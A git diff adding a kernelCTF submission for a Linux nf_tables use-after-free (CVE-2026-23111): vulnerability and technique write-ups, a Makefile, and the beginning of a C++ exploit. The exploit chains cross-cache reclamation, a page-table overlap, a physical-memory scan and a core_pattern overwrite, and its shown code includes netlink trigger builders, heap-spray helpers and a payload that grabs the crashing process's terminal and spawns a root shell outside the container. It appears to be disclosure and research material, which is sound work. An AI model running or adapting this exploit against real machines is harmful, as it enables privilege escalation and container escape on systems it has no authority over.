`|/proc/%P/fd/666 %P %P`. This causes the kernel to execute our binary (at `/proc//fd/666`) as root. 
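+
+As a side note, the `core_pattern` overwrite performed in Section 5.9 is simply an `aaw()`-style write through the corrupted PTE window; a hypothetical wrapper (not present in the exploit, which rewrites the PTE inline) could look like this:
+
+```c
+/* Hypothetical helper built on the primitives from Sections 5.8/5.9:
+ * once the kernel's physical base is known, redirect core_pattern. */
+static void overwrite_core_pattern(int pipe_fd[2], void *pt_window,
+                                   uintptr_t core_pattern_phys)
+{
+    static const char payload[] = "|/proc/%P/fd/666 %P %P";
+
+    /* aaw() rewrites the overlapped PTE page so that pt_window maps the
+     * physical page holding core_pattern, then copies the payload through it. */
+    aaw(pipe_fd, (void *)core_pattern_phys, (void *)payload, pt_window,
+        sizeof(payload));
+}
+```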
+ +- [exploit/cos-121-18867.294.100/exploit.c#L623](../exploit/cos-121-18867.294.100/exploit.c#L623) +```c +if (argc > 2) { + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + + system("cat /flag"); + execlp("bash", "bash", NULL); +} +``` + +When the binary is executed as root via `core_pattern`, it receives the crashing process's PID as an argument. It uses `pidfd_open` and `pidfd_getfd` to steal the parent's stdin/stdout/stderr file descriptors, reads the flag, and drops a root shell outside the container. + +## 6. Summary + +This exploit chains together the following primitives: +1. **Unbalanced refcount decrement** via inverted genmask check in `nft_map_catchall_activate()` -> chain use-after-free +2. **Cross-cache #1** (`kmalloc-cg-128` -> `kmalloc-16`) to reclaim chain memory with `unix_address` objects -> refcount corruption via UAF field overlap +3. **Cross-cache #2** (`kmalloc-16` -> pipe page) via invalid `kfree` on drained slab -> page-level free (refer [novel-techniques.md](./novel-techniques.md#exploiting-unexpected-behavior-of-invalid-address-kfree)) +4. **Page table / pipe buffer overlap** via page UAF -> physical arbitrary read/write +5. **PhysASLR bypass** via linear physical memory scan (refer [novel-techniques.md](./novel-techniques.md#effective-bypass-of-physaslr)) +6. **`core_pattern` overwrite** -> root code execution outside the container + +Exploit stability: ~60-70% success rate (excluding post-exploitation), ~20-30% (including post-exploitation). diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/novel-techniques.md new file mode 100644 index 000000000..f60fd1bea --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/novel-techniques.md @@ -0,0 +1,121 @@ +# Novel Techniques + +While exploiting CVE-2026-23111, we identified two novel exploit techniques: an effective bypass of physical ASLR through linear physical memory scanning, and a method to pivot a SLUB object UAF into a page-level UAF via invalid `kfree`. These techniques enabled a full exploit chain from a Netfilter chain unbalanced refcount decrement to root code execution without requiring any kernel address leak. + +## Effective bypass of physASLR + +Physical ASLR (physASLR/KASLR) randomizes the physical base address at which the kernel image is loaded. This is intended to prevent attackers from predicting where kernel data structures reside in physical memory. However, when an attacker already has a physical arbitrary read/write primitive, physASLR can be bypassed with a simple linear scan without requiring any information leak. + +In our exploit, we know the offset of `core_pattern` from the kernel physical base on the target COS image (`0x3fb3440`). The kernel physical base is aligned to a large boundary. 
We scan candidate base addresses at 16 MB (0x1000000) intervals: + +- [exploit/cos-121-18867.294.100/exploit.c#L927](../exploit/cos-121-18867.294.100/exploit.c#L927) +```c +#define CORE_PATTERN_PHYS_ADDR 0x3fb3440 +int cnt = 0; +while (1) { + aar(pipe_arr[pt_idx], tmp_buf, + CORE_PATTERN_PHYS_ADDR + cnt * 0x1000000, pt_addr, PG_SIZE); + char *core_pattern_addr = (char *)(pt_addr + (CORE_PATTERN_PHYS_ADDR & 0xfff)); + if (!strcmp(core_pattern_addr, "core")) { + // found kernel physical base at offset cnt * 0x1000000 + break; + } + cnt++; +} +``` + +Each iteration reads one page at a candidate physical address using our `aar()` (arbitrary address read) function, which works by rewriting a PTE to map a user-space virtual address to the target physical address. If the page contains the expected `"core"` string at the correct offset, we have found the kernel image. + +On typical configurations with a few GB of physical memory, this scan completes within a small number of iterations (less than ~256 for 4 GB of RAM at 16 MB intervals). Each attempt is a simple memory read with no side effects that would trigger detection or instability. + +This demonstrates that physASLR provides limited protection against attackers with physical memory access. Once an attacker can read/write arbitrary physical addresses (e.g., through page table corruption), the randomized base can be trivially recovered through sequential probing. Unlike virtual KASLR bypass techniques that typically require information leaks via side channels, OOB reads, or sprayed kernel pointers, this approach requires no information leak at all, only the ability to read physical memory. + +To the best of our knowledge, this is the first kernelCTF submission to bypass physASLR using a linear physical memory scan. + +## Exploiting unexpected behavior of invalid address `kfree` + +When `kfree()` is called on a pointer whose underlying slab page has already been freed and reassigned to a non-slab use (e.g., pipe buffer), the slab allocator can inadvertently free the page back to the page allocator: + +- [mm/slab_common.c:kfree()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/mm/slab_common.c?h=v6.6) +```c +void kfree(const void *object) +{ + struct folio *folio; + struct slab *slab; + struct kmem_cache *s; + // ... + folio = virt_to_folio(object); // [1] resolve physical page + if (unlikely(!folio_test_slab(folio))) { + free_large_kmalloc(folio, (void *)object); // [2] non-slab path + return; + } + slab = folio_slab(folio); + s = slab->slab_cache; + __kmem_cache_free(s, (void *)object, _RET_IP_); // [3] slab path +} +``` + +At [1], `kfree()` resolves the pointer to its physical page. If the page is no longer marked as a slab page, it takes the non-slab path at [2], which calls `free_large_kmalloc()`: + +- [mm/slab_common.c:free_large_kmalloc()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/mm/slab_common.c?h=v6.6) +```c +void free_large_kmalloc(struct folio *folio, void *object) +{ + unsigned int order = folio_order(folio); + + if (WARN_ON_ONCE(order == 0)) // [4] + pr_warn_once("object pointer: 0x%p\n", object); + // ... + __free_pages(folio_page(folio, 0), order); // [5] +} +``` + +The function warns if the folio order is 0 [4], but does not prevent the free. `__free_pages()` [5] frees the underlying page back to the page allocator regardless. 
This means `kfree()` on a stale pointer whose page has been repurposed to a non-slab use will trigger a warning but still free the page, turning a SLUB object UAF into a page UAF. + +In our exploit, we achieve this through two stages of cross-cache reclamation (`kmalloc-cg-128` -> `kmalloc-16` -> pipe page). First, the freed `nft_chain` object (`kmalloc-cg-128`) is reclaimed by `unix_address` objects (`kmalloc-16`). The `unix_address->refcnt` field at offset 0 overlaps with `nft_chain->use`, so the vulnerability's UAF decrement corrupts the refcount, leading to a premature `kfree()` of the `unix_address` while a server socket still holds a dangling reference. + +We then drain the `kmalloc-16` slab and spray pipe pages to reclaim the freed pages. The dangling `unix_address` pointer now points into a pipe buffer page, which is no longer a slab page. When we close the remaining server socket, `unix_sock_destructor()` calls `kfree()` on this dangling pointer. Since the page is no longer a slab page, `folio_test_slab()` [1] fails and `kfree()` takes the non-slab path [2], freeing the pipe page back to the page allocator. A page table spray then reclaims it, creating a pipe buffer / page table overlap that provides arbitrary physical read/write. + +This technique generalizes: any situation where a UAF access corrupts a refcount field of a cross-cache overlapping object can be pivoted into a page-level primitive via the resulting double free. The premature free effectively "promotes" a SLUB object UAF to a page UAF, bypassing slab-level mitigations such as `CONFIG_RANDOM_KMALLOC_CACHES`. This is particularly useful in scenarios where the attacker does not have enough control over the freed object's content to exploit it at the slab level (e.g., no heap/KASLR leak for traditional slab-based techniques). By escalating to the page level, we gain physical AARW without ever needing a kernel address leak. + +Interestingly, this technique is prevented on the [mitigation instance](https://github.com/thejh/linux/tree/4c5b4a60a8f52798223807f76442e96d9eb15046) by `CONFIG_SLAB_VIRTUAL`, though likely as an unintended side effect rather than a deliberate defense against this specific attack pattern. With `CONFIG_SLAB_VIRTUAL`, slab objects are accessed through a dedicated virtual address range (`SLAB_DATA_BASE_ADDR`), decoupled from the underlying physical pages. When a slab page is freed via `__free_slab()`, the PTEs for the slab's virtual address range are cleared: + +- [mm/slub.c:__free_slab() (CONFIG_SLAB_VIRTUAL)](https://github.com/thejh/linux/blob/4c5b4a60a8f52798223807f76442e96d9eb15046/mm/slub.c) +```c +#ifdef CONFIG_SLAB_VIRTUAL +static void __free_slab(struct kmem_cache *s, struct slab *slab) +{ + // ... + for (i = 0; i < pages; i++) { + ptep_clear(...); // clear PTE for each slab page + } + // queue for TLB flush and physical page deallocation +} +#endif +``` + +After our cross-cache step (chain freed from `kmalloc-cg-128`, page returned to page allocator, reclaimed by `kmalloc-16`), the stale chain pointer's virtual address is no longer mapped. 
Any UAF access through this pointer, such as the `nft_data_release()` decrement on `chain->use`, would fault or be rejected by `virt_to_slab()`, which checks `is_slab_addr()` and validates slab metadata:
+
+- [mm/slab.h:virt_to_slab() (CONFIG_SLAB_VIRTUAL)](https://github.com/thejh/linux/blob/4c5b4a60a8f52798223807f76442e96d9eb15046/mm/slab.h)
+```c
+static inline struct slab *virt_to_slab(const void *addr)
+{
+    struct slab *slab, *slab_head;
+
+    if (!is_slab_addr(addr)) // reject if not in slab virtual range
+        return NULL;
+
+    slab = (struct slab *)virt_to_slab_raw((unsigned long)addr);
+    slab_head = slab->compound_slab_head;
+
+    if (CHECK_DATA_CORRUPTION(!is_slab_meta(slab_head),
+                              "compound slab head out of meta range: %p", slab_head))
+        return NULL;
+
+    return slab_head;
+}
+```
+
+The decoupling of slab virtual addresses from physical pages means that cross-cache reuse does not preserve the old pointer's validity, which happens to block the UAF field overlap that our technique relies on. The original design goal of `CONFIG_SLAB_VIRTUAL` is to prevent cross-cache attacks, but this incidental invalidation of stale pointers also closes off the escalation path from SLUB-level UAF to page-level UAF.
+
+To the best of our knowledge, this is the first kernelCTF submission to exploit invalid `kfree` behavior to pivot a SLUB UAF into a page-level UAF.
diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/vulnerability.md
new file mode 100644
index 000000000..9516e87f6
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/vulnerability.md
@@ -0,0 +1,29 @@
+# Vulnerability
+
+A use-after-free vulnerability was found in the Linux kernel's Netfilter nf_tables subsystem (`net/netfilter/nf_tables_api.c`). An inverted genmask check in the `nft_map_catchall_activate()` abort path leads to a chain refcount underflow and a use-after-free of an `nft_chain` object. This leads to local privilege escalation (LPE).
+
+## Requirements to trigger the vulnerability:
+- Capabilities: To trigger the vulnerability, the `CAP_NET_ADMIN` capability is required to access the Netfilter subsystem.
+- Kernel configuration: Kernel configs related to the Netfilter nf_tables subsystem (e.g., `CONFIG_NETFILTER`, `CONFIG_NF_TABLES`) are required to trigger this vulnerability. These configs are generally enabled by default (e.g., in `x86_64_defconfig`).
+- Are user namespaces needed?: Yes. As this vulnerability requires `CAP_NET_ADMIN`, which is not usually granted to a normal user, we use an unprivileged user namespace to obtain this capability.
+
+## Commit which introduced the vulnerability
+- This vulnerability was introduced in Linux v6.4, with commit [628bd3e49cba1c066228e23d71a852c23e26da73](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=628bd3e49cba1c066228e23d71a852c23e26da73)
+- This commit moves map element reference dropping from the set `.destroy` phase to the preparation phase to prevent refcount imbalance and spurious EBUSY errors; the catchall handling it added contains the inverted genmask check.
+
+## Commit which fixed the vulnerability
+- This vulnerability was fixed in Linux v6.19, with commit [f41c5d151078c5348271ffaf8e7410d96f2d82f8](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f41c5d151078c5348271ffaf8e7410d96f2d82f8)
+- This commit fixes the inverted genmask check in the `nft_map_catchall_activate()` abort path that caused the chain refcount underflow and use-after-free in nf_tables.
+ +## Affected kernel versions +- Linux version v6.4 ~ v6.19 affects to this vulnerability + +## Affected component, subsystem +- net/netfilter (nf_tables) + +## Cause (UAF, BoF, race condition, double free, refcount overflow, etc) +- Use-after-free + +## Which syscalls or syscall parameters are needed to be blocked to prevent triggering the vulnerability? (If there is any easy way to block it.) +- Disable syscalls for Netfilter (specifically, Netfilter nf_tables) system (ex. `socket`, `sendmsg` with Netlink socket) to prevent this vulnerability. +- Disable syscalls for unprivileged user namespace (ex. `clone`, `unshare`) can reduce the attack surface since the Netfilter system requires `CAP_NET_ADMIN` to use. diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/Makefile b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/Makefile new file mode 100644 index 000000000..6a4ee7a0b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/Makefile @@ -0,0 +1,58 @@ +CC = g++ +SRCS := ./exploit.cpp +TARGETS := exploit exploit_debug +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build +LIBXDK_DIR = $(realpath ./)/libxdk_build + +CFLAGS = -w -static -Wall -fpermissive +LIBS = -L$(LIBMNL_DIR)/install/usr/local/lib -L$(LIBNFTNL_DIR)/install/usr/local/lib -L$(LIBXDK_DIR)/lib -lnftnl -lmnl -lkernelXDK -lkeyutils +INCLUDES = -I$(LIBMNL_DIR)/install/usr/local/include -I$(LIBNFTNL_DIR)/install/usr/local/include -I$(LIBXDK_DIR)/include + +all: exploit + +exploit : libmnl-build libnftnl-build libxdk-build target_db.kxdb + $(CC) $(CFLAGS) $(SRCS) -o $@ $(INCLUDES) $(LIBS) + +exploit_debug: CFLAGS += -g -DDEBUG +exploit_debug: libmnl-build libnftnl-build libxdk-build target_db.kxdb + $(CC) $(CFLAGS) $(SRCS) -o $@ $(INCLUDES) $(LIBS) + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && mkdir ../install && make DESTDIR=`realpath ../install` install + +libnftnl-build : libmnl-build libnftnl-download + tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.1.tar.bz2 + cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/usr/local/lib/pkgconfig ./configure --enable-static + cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/usr/local/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/usr/local/lib make -j`nproc` + cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && mkdir ../install && make DESTDIR=`realpath ../install` install + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + + +libnftnl-download : + mkdir $(LIBNFTNL_DIR) + wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.1.tar.bz2 + +libxdk-build : + mkdir -p $(LIBXDK_DIR) + wget -O $(LIBXDK_DIR)/libxdk-v0.1.tar.gz https://github.com/google/kernel-research/releases/download/libxdk/v0.1/libxdk-v0.1.tar.gz + tar -C $(LIBXDK_DIR) -xzf $(LIBXDK_DIR)/libxdk-v0.1.tar.gz + +target_db.kxdb : + wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb + +.PHONY: all libmnl-build libnftnl-build libxdk-build libmnl-download libnftnl-download clean +clean: + rm -f $(TARGETS) + if [ -d $(LIBMNL_DIR)/libmnl-1.0.5 ]; then cd $(LIBMNL_DIR)/libmnl-1.0.5 && make 
DESTDIR=`realpath ../install` uninstall; fi + if [ -d $(LIBNFTNL_DIR)/libnftnl-1.2.1 ]; then cd $(LIBNFTNL_DIR)/libnftnl-1.2.1 && make DESTDIR=`realpath ../install` uninstall; fi + rm -rf $(LIBMNL_DIR) + rm -rf $(LIBNFTNL_DIR) + rm -rf $(LIBXDK_DIR) + rm -f target_db.kxdb diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit new file mode 100644 index 000000000..554e2f91c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit.cpp b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit.cpp new file mode 100644 index 000000000..8e552f44b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/exploit/cos-121-18867.294.100/exploit.cpp @@ -0,0 +1,989 @@ +// g++ exploit.cpp -o exploit -lmnl -lnftnl -lkernelXDK -lkeyutils -w +// Must run as root +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include // getrlimit, setrlimit, unshare, open +#include // O_WRONLY +#include // struct rlimit, RLIMIT_* +#include // unshare, CLONE_NEW*, sched_setaffinity +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#ifndef htons +#define htons(x) __builtin_bswap16((uint16_t)(x)) +#endif +#ifndef htonl +#define htonl(x) __builtin_bswap32((uint32_t)(x)) +#endif + +INCBIN(target_db, "target_db.kxdb"); + +#define DEBUG + +#ifdef DEBUG +#define DEBUG_PRINT printf +#else +#define DEBUG_PRINT(...) 
((void)0) +#endif + +struct msgp +{ + long mtype; + char mtext[1]; +}; + +void init_msgq(int *msgq_arr, size_t cnt) +{ + for (size_t i = 0; i < cnt; i++) + if ((msgq_arr[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) < 0) + perror("msgget"); +} + +int send_msg(int msgqid, char *data, size_t size, long mtype) +{ + struct msgp *m = malloc(sizeof(long) + size); + int ret = -1; + memcpy(m->mtext, data, size); + m->mtype = mtype; + + ret = msgsnd(msgqid, m, size, 0); + + free(m); + return ret; +} + +void spray_msgsnd(int *msgq_arr, size_t spray_size, size_t cache_size, size_t msg_msg_hdr_size, char *data, size_t iter, long mtype) +{ + for (size_t i = 0; i < spray_size; i++) + for (size_t j = 0; j < iter; j++) + { + if (msgq_arr[i] < 0) + continue; + if (send_msg(msgq_arr[i], data, cache_size - msg_msg_hdr_size, mtype) < 0) + perror("msgsnd"); + } + return; +} + +void release_msg(int *msgq_arr, size_t spray_size) +{ + int ret; + char msg_buf[0x2000]; + struct msgp *msg = (struct msgp *)msg_buf; + + for (size_t i = 0; i < spray_size; i++) + { + if (msgq_arr[i] < 0) + continue; + memset(msg_buf, 0, sizeof(msg_buf)); + ret = msgrcv(msgq_arr[i], msg, sizeof(msg_buf) - 1, 0, IPC_NOWAIT); + if (ret < 0) + perror("msgrcv"); + } +} + +void init_unix_sock(int *sock_arr, size_t cnt) +{ + for(int i = 0; i < cnt; i++){ + if ((sock_arr[i] = socket(AF_UNIX, SOCK_STREAM, 0)) < 0) { + perror("init_unix_sock socket"); + for(;;); + } + int flags = fcntl(sock_arr[i], F_GETFL, 0); + if (flags < 0) { + perror("init_unix_sock fcntl F_GETFL"); + for(;;); + } + + if (fcntl(sock_arr[i], F_SETFL, flags | O_NONBLOCK) < 0){ + perror("init_unix_sock fcntl F_SETFL"); + for(;;); + } + } + +} + +/* + * nft_map_catchall_activate() inverted activity check PoC + * + * Since libnftnl's NFTNL_SET_ELEM_VERDICT/CHAIN may not work on all + * versions, we build the NEWSETELEM message with raw netlink attributes + * for the verdict data. 
+ */ + +static struct mnl_socket *nl; +static unsigned int portid; +static char buf[0x4000 * 2]; + +/* ── netlink helpers ── */ +static int send_batch_and_recv(struct mnl_nlmsg_batch *batch) +{ + int ret = mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch)); + mnl_nlmsg_batch_stop(batch); + if (ret < 0) return ret; + + int last_error = 0; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + while (ret > 0) { + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + int len = ret; + while (mnl_nlmsg_ok(nlh, len)) { + if (nlh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = mnl_nlmsg_get_payload(nlh); + if (e->error != 0) { + last_error = e->error; + DEBUG_PRINT(" [nlerr] seq=%u error=%d (%s)\n", + nlh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + nlh = mnl_nlmsg_next(nlh, &len); + } + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + return last_error; +} + +static void batch_begin(struct mnl_nlmsg_batch *batch, uint32_t *seq) +{ + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); +} + +static void batch_end(struct mnl_nlmsg_batch *batch, uint32_t *seq) +{ + nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); +} + +/* ── table ── */ +static void add_table(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *name) +{ + struct nftnl_table *t = nftnl_table_alloc(); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWTABLE, family, + NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_table_nlmsg_build_payload(nlh, t); + mnl_nlmsg_batch_next(batch); + nftnl_table_free(t); +} + +static void del_table(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *name) +{ + struct nftnl_table *t = nftnl_table_alloc(); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + struct nlmsghdr *nlh = nftnl_table_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELTABLE, family, + NLM_F_ACK, (*seq)++); + nftnl_table_nlmsg_build_payload(nlh, t); + mnl_nlmsg_batch_next(batch); + nftnl_table_free(t); +} + +/* ── chain ── */ +static void add_chain(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *chain, bool is_base) +{ + struct nftnl_chain *c = nftnl_chain_alloc(); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain); + if (is_base) { + nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, NF_INET_LOCAL_IN); + nftnl_chain_set_s32(c, NFTNL_CHAIN_PRIO, 0); + nftnl_chain_set_str(c, NFTNL_CHAIN_TYPE, "filter"); + nftnl_chain_set_u32(c, NFTNL_CHAIN_POLICY, NF_ACCEPT); + } + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWCHAIN, family, + NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_chain_nlmsg_build_payload(nlh, c); + mnl_nlmsg_batch_next(batch); + nftnl_chain_free(c); +} + +static void del_chain(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, const char *chain) +{ + struct nftnl_chain *c = nftnl_chain_alloc(); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table); + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain); + struct nlmsghdr *nlh = nftnl_chain_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELCHAIN, family, + NLM_F_ACK, (*seq)++); + nftnl_chain_nlmsg_build_payload(nlh, c); + mnl_nlmsg_batch_next(batch); + nftnl_chain_free(c); +} + +/* ── verdict map (NEWSET) ── */ +static void 
add_verdict_map(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name, uint32_t set_id) +{ + struct nftnl_set *s = nftnl_set_alloc(); + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_str(s, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(s, NFTNL_SET_ID, set_id); + nftnl_set_set_u32(s, NFTNL_SET_KEY_LEN, 4); + nftnl_set_set_u32(s, NFTNL_SET_KEY_TYPE, 13); /* inet_service */ + nftnl_set_set_u32(s, NFTNL_SET_DATA_TYPE, 0xffffff00); + nftnl_set_set_u32(s, NFTNL_SET_DATA_LEN, sizeof(uint32_t)); + nftnl_set_set_u32(s, NFTNL_SET_FLAGS, NFT_SET_MAP); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_set_nlmsg_build_payload(nlh, s); + mnl_nlmsg_batch_next(batch); + nftnl_set_free(s); +} + +/* + * ── Build NEWSETELEM with catchall + goto verdict using raw NLA ── + * + * The netlink message structure for a set element with verdict data: + * + * NFT_MSG_NEWSETELEM + * NFTA_SET_ELEM_LIST_TABLE = "poc_table" + * NFTA_SET_ELEM_LIST_SET = "vmap" + * NFTA_SET_ELEM_LIST_SET_ID = 100 + * NFTA_SET_ELEM_LIST_ELEMENTS (nested) + * NFTA_LIST_ELEM (nested) + * NFTA_SET_ELEM_FLAGS = NFT_SET_ELEM_CATCHALL + * NFTA_SET_ELEM_DATA (nested) + * NFTA_DATA_VERDICT (nested) + * NFTA_VERDICT_CODE = NFT_GOTO (-3) + * NFTA_VERDICT_CHAIN = "target_chain" + */ +static void add_catchall_elem_raw(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name, uint32_t set_id, + const char *goto_chain) +{ + struct nlmsghdr *nlh; + struct nfgenmsg *nfg; + + nlh = mnl_nlmsg_put_header(mnl_nlmsg_batch_current(batch)); + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | NFT_MSG_NEWSETELEM; + nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_ACK; + nlh->nlmsg_seq = (*seq)++; + + nfg = mnl_nlmsg_put_extra_header(nlh, sizeof(*nfg)); + nfg->nfgen_family = family; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(0); + + /* NFTA_SET_ELEM_LIST_TABLE */ + mnl_attr_put_strz(nlh, NFTA_SET_ELEM_LIST_TABLE, table); + /* NFTA_SET_ELEM_LIST_SET */ + mnl_attr_put_strz(nlh, NFTA_SET_ELEM_LIST_SET, set_name); + /* NFTA_SET_ELEM_LIST_SET_ID */ + mnl_attr_put_u32(nlh, NFTA_SET_ELEM_LIST_SET_ID, htonl(set_id)); + + /* NFTA_SET_ELEM_LIST_ELEMENTS (nested) */ + struct nlattr *nest_elems = mnl_attr_nest_start(nlh, NFTA_SET_ELEM_LIST_ELEMENTS); + + /* NFTA_LIST_ELEM (nested) — one element */ + struct nlattr *nest_elem = mnl_attr_nest_start(nlh, 1); /* NFTA_LIST_ELEM = 1 */ + + /* NFTA_SET_ELEM_FLAGS = NFT_SET_ELEM_CATCHALL (0x20) */ + mnl_attr_put_u32(nlh, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + + /* NFTA_SET_ELEM_DATA (nested) */ + struct nlattr *nest_data = mnl_attr_nest_start(nlh, NFTA_SET_ELEM_DATA); + + /* NFTA_DATA_VERDICT (nested) */ + struct nlattr *nest_verdict = mnl_attr_nest_start(nlh, NFTA_DATA_VERDICT); + + /* NFTA_VERDICT_CODE = NFT_GOTO */ + mnl_attr_put_u32(nlh, NFTA_VERDICT_CODE, htonl(NFT_GOTO)); + /* NFTA_VERDICT_CHAIN = "target_chain" */ + mnl_attr_put_strz(nlh, NFTA_VERDICT_CHAIN, goto_chain); + + mnl_attr_nest_end(nlh, nest_verdict); + + mnl_attr_nest_end(nlh, nest_data); + + mnl_attr_nest_end(nlh, nest_elem); + + mnl_attr_nest_end(nlh, nest_elems); + + mnl_nlmsg_batch_next(batch); +} + +/* ── DELSET + failing NEWRULE → abort ── */ +static void trigger_abort(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name) +{ + /* Step 1: DELSET — prepare succeeds, 
catchall deactivated, chain->use-- */ + struct nftnl_set *s = nftnl_set_alloc(); + nftnl_set_set_str(s, NFTNL_SET_TABLE, table); + nftnl_set_set_str(s, NFTNL_SET_NAME, set_name); + + struct nlmsghdr *nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_DELSET, family, + NLM_F_ACK, (*seq)++); + nftnl_set_nlmsg_build_payload(nlh, s); + mnl_nlmsg_batch_next(batch); + nftnl_set_free(s); + + /* Step 2: NEWRULE on non-existent chain → fails → batch aborts */ + struct nftnl_rule *rule = nftnl_rule_alloc(); + nftnl_rule_set_u32(rule, NFTNL_RULE_FAMILY, family); + nftnl_rule_set_str(rule, NFTNL_RULE_TABLE, table); + nftnl_rule_set_str(rule, NFTNL_RULE_CHAIN, "__nonexistent_chain__"); + + nlh = nftnl_rule_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWRULE, family, + NLM_F_APPEND | NLM_F_CREATE | NLM_F_ACK, (*seq)++); + nftnl_rule_nlmsg_build_payload(nlh, rule); + mnl_nlmsg_batch_next(batch); + nftnl_rule_free(rule); +} + +int ulimit_fd(void) { + struct rlimit rlim; + + // Get the current resource limits + if (getrlimit(RLIMIT_NOFILE, &rlim) == -1) { + 